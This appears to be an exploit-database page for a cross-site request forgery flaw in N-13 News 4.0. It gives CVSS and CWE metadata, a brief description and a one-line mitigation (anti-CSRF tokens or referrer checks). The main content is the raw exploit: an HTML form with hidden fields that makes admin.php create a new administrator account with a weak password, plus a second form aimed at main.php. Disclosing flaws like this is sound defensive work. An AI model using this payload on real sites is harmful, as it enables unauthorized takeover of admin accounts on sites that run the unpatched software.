header-logo
Suggest Exploit
vendor:
N-13 News
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
CSRF
352
CWE
Product Name: N-13 News
Affected Version From: N-13 News 4.0
Affected Version To: N-13 News 4.0
Patch Exists: No
Related CWE:
CPE: a:n-13_news:n-13_news:4.0
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

N-13 News 4.0 CSRF Vulnerability (Add Admin)

The N-13 News 4.0 version is vulnerable to CSRF (Cross-Site Request Forgery) attack. An attacker can add a new admin user by exploiting this vulnerability. The exploit involves submitting a crafted form to the admin.php file with the required parameters.

Mitigation:

To mitigate this vulnerability, it is recommended to implement CSRF protection mechanisms such as using anti-CSRF tokens or checking the referrer header in server-side code.
Source

Exploit-DB raw data:

N-13 News 4.0 CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://n-13news.googlecode.com/files/n13news4.0.1.zip
.:. Tested On Demo : http://network-13.com/news/
.:. Home           : http://www.sec-risk.com/vb/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/N-13 News 4.0/admin.php?action=options&mod=accounts&create=new">
<input type="hidden" name="accountname" value="WebAdmin"/>
<input type="hidden" name="accountemail" value="Example@hotmail.com"/>
<input type="hidden" name="accountpassword1" value="123456"/>
<input type="hidden" name="accountpassword2" value="123456"/>
<input type="hidden" name="accountaccesslevel" value="1"/>
<input type="hidden" name="S1" value="Save"/>
</form>
<form method="GET" name="form1" action="http://localhost/N-13 News 4.0/js/main.php">
<input type="hidden" name="name" value="value"/> 
</form>

</body>
</html>
####################################################################

Navigation

Suggest Exploit

Services By CQR